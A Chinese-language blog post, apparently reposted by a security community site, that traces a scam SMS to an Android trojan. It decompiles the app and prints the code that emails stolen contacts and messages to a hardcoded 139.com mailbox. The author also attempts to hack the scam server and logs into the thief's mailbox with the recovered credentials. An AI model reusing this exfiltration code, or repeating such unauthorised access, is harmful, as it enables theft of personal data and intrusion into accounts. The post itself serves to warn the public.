FavoriteLoading
0

诈骗短信“老窝”被端全过程:你就在名单里

今天本来是挺忙的,心情也还不错,快到周末了嘛!可是下面这条短信却让俺生气了:

1

您说,俺一个热爱祖国热爱人民的有志青年,怎么就被人黑成这样呢,越想越来气,要在平时这种事是不爱管的,今天不行了,必须把这个王八蛋揪出来,@张家小伙 怎么说来着?必须往死里整。
于是,俺先象征性的给这个电话15112014684打过去,电话属广东广州移动通信,结果提示:正在通话中,估计是这货设置了不接来电,也许就是一废卡,或者某个短信群发器的号吧,不管了,先从网址入手。
先看这个网址www.ipnps.com, 在电脑上用最简单的CMD命令行PING一下,IP显示为:118.193.208.78,通过IP查询,知道这个主机位置在香港特别行政区,然后浏览器输入IP地址,显示一个MSSQL数据库管理界面,黑了几下没成功,用的IIS+ASP.NET+防DDOS,安全系数比较高,算了!
在电脑上打开这个网址,记住:千万别在手机短信或者聊天软件上打开不明来源的网址,八成是一个木马APP。下载了一个240KB没后缀名的文件,就它了,改后缀为图片、视频、网页什么的都打不开,一堆乱码,索性先弄个PING忽悠一下他服务器,于是发了微信叫圈儿里的朋友们帮忙黑它,胖子哥们儿说Ping不通,有人问怎么弄……

2

到这里,华盟君去食堂吃饭了,想了一路,给@翼网天狼 这技术哥打了个电话,他说你用解压缩解一解试试,我一拍脑袋——对呀,怎么就把这给忘了!

3

急匆匆回来,啃了一个火龙果开干,后缀名改成rar或ZIP或7Z或TAZ等等,都被360安全卫士报毒,可想而知,这就是一个病毒啊!!
但是很奇怪,没有后缀名时,360为啥不报毒,难道让我在电脑里养着??
干脆也不变后缀名了,直接拿360解压缩,结果就出来了,是一个安卓的APP程序,已经封包了,没关系,俺把它给破了。

4

 

准备三样工具:
1、apktool反编译工具;
2、dex2jar-0.0.9.15析出JAVA代码;
3、jd-gui-0.3.5.windows查看源代码。
按照步骤来,以下是截图:

111

222

333

到这里,俺@华盟君 就算成功90%了,为啥哩,有了源代码就知道这个APP木马到底干的啥勾当了。
哥们儿,姐们儿们,您看到这里是不是累了,别觉得跟自己没关系,接着往下看,看不懂就先凑个热闹吧!
在源码结构里,一般都把恶劣的病毒程序放在swx里,好了,我不是个JAVA程序猿,但也学过几天不是,没翻半分钟,这厮的马脚就露出来了,在ti.isq.swx分列下的a.class文件中,我们发现了下面这段代码:

666

public static int a(String paramString1, String paramString2, String paramString3)
{
if (a)
return 1;
i locali = new i("1341643****@139.com", "qq123****");
locali.c("smtp.139.com");
locali.b("25");
locali.a(true);
locali.a(new String[] { paramString1 });
locali.a("13416437901@139.com");
locali.d(paramString2);
locali.e(paramString3);
一看就是139邮箱的,这里实现的功能是把从手机里窃取的信息发到这个邮箱,好了,用用户名和密码登陆:mail.139.com
然后,老窝就被端出来了!!看下面几张图:
【1】进入他的邮件:

2016128135328400

【2】看到了一大堆刚接收到的窃密邮件:

q

【3】打开任一邮件,可以看到通讯录或者短信列表:

w

e

瞧见上面的通讯录和短信列表了吧,真是触目惊心!!简直看不下去了,想想自己的通讯录和短信是不是也被别的什么APP截获了?想想都非常的震惊、可怕!!邮件总数大概有上千封,而且就在俺写这篇文章中间不断收到新邮件,每一封新邮件预示着又多了个被骗的人!!
俺象征性的给几个中标的人打了电话,告诉了他们这件事,有的骂我是骗子,更多的还是表示感谢,烟台的小兄弟还说你来烟台一定给我打电话,上海的老张、还有重庆的老王,四川的李姐……没办法,我电话也没几个钱,不可能一一去通知了,所以写下这篇文章希望提醒您,并且通过您的转发提醒身边所有的朋友们,遇到不明来历的短信或微信等的网址,不要去点开,好吗?
在这里,解释一个问题:有朋友问,他怎么知道我的名字呢?原理很简单:存着你号码的某个同事或朋友点击了网址或者安装了不明来历的APP程序,他的通讯录或短信列表被端了,你的名字和手机号当然就在他们的掌控之中了!!
所以,写到这里,@华盟君 实在写不下去了,在已经向网警报案的同时,我把他们接收到的通讯录挨个删了,可是删是删不完的,还是不断有人被骗,音箱都已经关了,蹦蹦蹦的往外跳邮件,不断有人被骗——
所以,当您遇到这样的信息,不要打开,直接删除:
瞧一瞧你干的好事微博都转疯了可耻啊,www.ipnps.com ,资料都在里面,自己下载好好看看吧··
这是诈骗短信!!截至目前已经有3755人被黑了通讯录和短信,通讯录总量已经达到3万多条,醒醒吧!转发扩散!!
****************************

 

8090网络安全社区:309582297

【声明】:8090安全小组门户(http://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱hack@ddos.social,我们会在最短的时间内进行处理。